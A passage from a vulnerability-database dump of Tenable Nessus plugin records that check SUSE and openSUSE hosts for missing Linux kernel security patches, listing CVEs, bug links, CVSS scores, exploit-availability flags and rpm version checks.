attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047626\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066472\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066573\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066618\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066625\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066700\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1066705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1067085\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1067086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1067997\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1070781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=860993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-0038/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000405/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12193/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15102/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16525/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16527/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16529/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16531/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16535/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16536/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16537/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16649/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16650/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16939/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20173249-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?73fbeea3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-2024=1\n\nSUSE Linux Enterprise Module for Public Cloud 12:zypper in -t patch\nSUSE-SLE-Module-Public-Cloud-12-2017-2024=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_106-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_106-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_106-default-1-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_106-xen-1-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.61-52.106.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.61-52.106.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:49:43", "description": "The Linux kernel was updated to fix various bugs and security issues :\n\n - mm/page-writeback.c: do not count anon pages as dirtyable memory (reclaim stalls).\n\n - mm/page-writeback.c: fix dirty_balance_reserve subtraction from dirtyable memory (reclaim stalls).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - net: fib: fib6_add: fix potential NULL pointer dereference (bnc#854173 CVE-2013-6431).\n\n - keys: fix race with concurrent install_user_keyrings() (bnc#808358)(CVE-2013-1792).\n\n - KVM: x86: Convert vapic synchronization to _cached functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - wireless: radiotap: fix parsing buffer overrun (bnc#854634 CVE-2013-7027).\n\n - KVM: x86: fix guest-initiated crash with x2apic (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - KVM: x86: Fix potential divide by 0 in lapic (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587) (bnc#853050 CVE-2013-4587).\n\n - staging: ozwpan: prevent overflow in oz_cdev_write() (bnc#849023 CVE-2013-4513).\n\n - perf/x86: Fix offcore_rsp valid mask for SNB/IVB (bnc#825006).\n\n - perf/x86: Add Intel IvyBridge event scheduling constraints (bnc#825006).\n\n - libertas: potential oops in debugfs (bnc#852559 CVE-2013-6378).\n\n - aacraid: prevent invalid pointer dereference (bnc#852373 CVE-2013-6380).\n\n - staging: wlags49_h2: buffer overflow setting station name (bnc#849029 CVE-2013-4514).\n\n - net: flow_dissector: fail on evil iph->ihl (bnc#848079 CVE-2013-4348).\n\n - Staging: bcm: info leak in ioctl (bnc#849034 CVE-2013-4515).\n\n - Refresh patches.fixes/net-rework-recvmsg-handler-msg_name-and-ms g_namelen-logic.patch.\n\n - ipv6: remove max_addresses check from ipv6_create_tempaddr (bnc#805226, CVE-2013-0343).\n\n - net: rework recvmsg handler msg_name and msg_namelen logic (bnc#854722).\n\n - crypto: ansi_cprng - Fix off by one error in non-block size request (bnc#840226).\n\n - x6: Fix reserve_initrd so that acpi_initrd_override is reached (bnc#831836).\n\n - Refresh other Xen patches.\n\n - aacraid: missing capable() check in compat ioctl (bnc#852558).\n\n - patches.fixes/gpio-ich-fix-ichx_gpio_check_available-ret urn.patch: Update upstream reference\n\n - perf/ftrace: Fix paranoid level for enabling function tracer (bnc#849362).\n\n - xhci: fix NULL pointer dereference on ring_doorbell_for_active_rings (bnc#848255).\n\n - xhci: Fix oops happening after address device timeout (bnc#848255).\n\n - xhci: Ensure a command structure points to the correct trb on the command ring (bnc#848255).\n\n - patches.arch/iommu-vt-d-remove-stack-trace-from-broken-i rq-remapping-warning.patch: Update upstream reference.\n\n - Allow NFSv4 username mapping to work properly (bnc#838024).\n\n - Refresh btrfs attribute publishing patchset to match openSUSE-13.1 No user-visible changes, but uses kobj_sysfs_ops and better kobject lifetime management.\n\n - Fix a few incorrectly checked [io_]remap_pfn_range() calls (bnc#849021, CVE-2013-4511).\n\n - drm/radeon: don't set hpd, afmt interrupts when interrupts are disabled.\n\n - patches.fixes/cifs-fill-TRANS2_QUERY_FILE_INFO-ByteCount\n -fields.patch: Fix TRANS2_QUERY_FILE_INFO ByteCount fields (bnc#804950).\n\n - iommu: Remove stack trace from broken irq remapping warning (bnc#844513).\n\n - Disable patches related to bnc#840656 patches.suse/btrfs-cleanup-don-t-check-the-same-thing-tw ice patches.suse/btrfs-0220-fix-for-patch-cleanup-don-t-chec k-the-same-thi.patch\n\n - btrfs: use feature attribute names to print better error messages.\n\n - btrfs: add ability to change features via sysfs.\n\n - btrfs: add publishing of unknown features in sysfs.\n\n - btrfs: publish per-super features to sysfs.\n\n - btrfs: add per-super attributes to sysfs.\n\n - btrfs: export supported featured to sysfs.\n\n - kobject: introduce kobj_completion.\n\n - btrfs: add ioctls to query/change feature bits online.\n\n - btrfs: use btrfs_commit_transaction when setting fslabel.\n\n - x86/iommu/vt-d: Expand interrupt remapping quirk to cover x58 chipset (bnc#844513).\n\n - NFSv4: Fix issues in nfs4_discover_server_trunking (bnc#811746).\n\n - iommu/vt-d: add quirk for broken interrupt remapping on 55XX chipsets (bnc#844513).", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : kernel (openSUSE-SU-2014:0204-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0343", "CVE-2013-1792", "CVE-2013-4348", "CVE-2013-4511", "CVE-2013-4513", "CVE-2013-4514", "CVE-2013-4515", "CVE-2013-4587", "CVE-2013-6367", "CVE-2013-6368", "CVE-2013-6376", "CVE-2013-6378", "CVE-2013-6380", "CVE-2013-6431", "CVE-2013-7027", "CVE-2014-0038"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-113.NASL", "href": "https://www.tenable.com/plugins/nessus/75251", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-113.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75251);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-0343\", \"CVE-2013-1792\", \"CVE-2013-4348\", \"CVE-2013-4511\", \"CVE-2013-4513\", \"CVE-2013-4514\", \"CVE-2013-4515\", \"CVE-2013-4587\", \"CVE-2013-6367\", \"CVE-2013-6368\", \"CVE-2013-6376\", \"CVE-2013-6378\", \"CVE-2013-6380\", \"CVE-2013-6431\", \"CVE-2013-7027\", \"CVE-2014-0038\");\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2014:0204-1)\");\n script_summary(english:\"Check for the openSUSE-2014-113 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Linux kernel was updated to fix various bugs and security issues :\n\n - mm/page-writeback.c: do not count anon pages as\n dirtyable memory (reclaim stalls).\n\n - mm/page-writeback.c: fix dirty_balance_reserve\n subtraction from dirtyable memory (reclaim stalls).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - net: fib: fib6_add: fix potential NULL pointer\n dereference (bnc#854173 CVE-2013-6431).\n\n - keys: fix race with concurrent install_user_keyrings()\n (bnc#808358)(CVE-2013-1792).\n\n - KVM: x86: Convert vapic synchronization to _cached\n functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - wireless: radiotap: fix parsing buffer overrun\n (bnc#854634 CVE-2013-7027).\n\n - KVM: x86: fix guest-initiated crash with x2apic\n (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - KVM: x86: Fix potential divide by 0 in lapic\n (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587)\n (bnc#853050 CVE-2013-4587).\n\n - staging: ozwpan: prevent overflow in oz_cdev_write()\n (bnc#849023 CVE-2013-4513).\n\n - perf/x86: Fix offcore_rsp valid mask for SNB/IVB\n (bnc#825006).\n\n - perf/x86: Add Intel IvyBridge event scheduling\n constraints (bnc#825006).\n\n - libertas: potential oops in debugfs (bnc#852559\n CVE-2013-6378).\n\n - aacraid: prevent invalid pointer dereference (bnc#852373\n CVE-2013-6380).\n\n - staging: wlags49_h2: buffer overflow setting station\n name (bnc#849029 CVE-2013-4514).\n\n - net: flow_dissector: fail on evil iph->ihl (bnc#848079\n CVE-2013-4348).\n\n - Staging: bcm: info leak in ioctl (bnc#849034\n CVE-2013-4515).\n\n - Refresh\n patches.fixes/net-rework-recvmsg-handler-msg_name-and-ms\n g_namelen-logic.patch.\n\n - ipv6: remove max_addresses check from\n ipv6_create_tempaddr (bnc#805226, CVE-2013-0343).\n\n - net: rework recvmsg handler msg_name and msg_namelen\n logic (bnc#854722).\n\n - crypto: ansi_cprng - Fix off by one error in non-block\n size request (bnc#840226).\n\n - x6: Fix reserve_initrd so that acpi_initrd_override is\n reached (bnc#831836).\n\n - Refresh other Xen patches.\n\n - aacraid: missing capable() check in compat ioctl\n (bnc#852558).\n\n -\n patches.fixes/gpio-ich-fix-ichx_gpio_check_available-ret\n urn.patch: Update upstream reference\n\n - perf/ftrace: Fix paranoid level for enabling function\n tracer (bnc#849362).\n\n - xhci: fix NULL pointer dereference on\n ring_doorbell_for_active_rings (bnc#848255).\n\n - xhci: Fix oops happening after address device timeout\n (bnc#848255).\n\n - xhci: Ensure a command structure points to the correct\n trb on the command ring (bnc#848255).\n\n -\n patches.arch/iommu-vt-d-remove-stack-trace-from-broken-i\n rq-remapping-warning.patch: Update upstream reference.\n\n - Allow NFSv4 username mapping to work properly\n (bnc#838024).\n\n - Refresh btrfs attribute publishing patchset to match\n openSUSE-13.1 No user-visible changes, but uses\n kobj_sysfs_ops and better kobject lifetime management.\n\n - Fix a few incorrectly checked [io_]remap_pfn_range()\n calls (bnc#849021, CVE-2013-4511).\n\n - drm/radeon: don't set hpd, afmt interrupts when\n interrupts are disabled.\n\n -\n patches.fixes/cifs-fill-TRANS2_QUERY_FILE_INFO-ByteCount\n -fields.patch: Fix TRANS2_QUERY_FILE_INFO ByteCount\n fields (bnc#804950).\n\n - iommu: Remove stack trace from broken irq remapping\n warning (bnc#844513).\n\n - Disable patches related to bnc#840656\n patches.suse/btrfs-cleanup-don-t-check-the-same-thing-tw\n ice\n patches.suse/btrfs-0220-fix-for-patch-cleanup-don-t-chec\n k-the-same-thi.patch\n\n - btrfs: use feature attribute names to print better error\n messages.\n\n - btrfs: add ability to change features via sysfs.\n\n - btrfs: add publishing of unknown features in sysfs.\n\n - btrfs: publish per-super features to sysfs.\n\n - btrfs: add per-super attributes to sysfs.\n\n - btrfs: export supported featured to sysfs.\n\n - kobject: introduce kobj_completion.\n\n - btrfs: add ioctls to query/change feature bits online.\n\n - btrfs: use btrfs_commit_transaction when setting\n fslabel.\n\n - x86/iommu/vt-d: Expand interrupt remapping quirk to\n cover x58 chipset (bnc#844513).\n\n - NFSv4: Fix issues in nfs4_discover_server_trunking\n (bnc#811746).\n\n - iommu/vt-d: add quirk for broken interrupt remapping on\n 55XX chipsets (bnc#844513).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=804950\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=805226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=808358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=811746\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825006\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=831836\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=838024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=840226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=840656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=844513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=848079\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=848255\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=849021\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=849023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=849029\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=849034\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=849362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=852373\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=852558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=852559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=853050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=853051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=853052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=853053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=854173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=854634\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=854722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 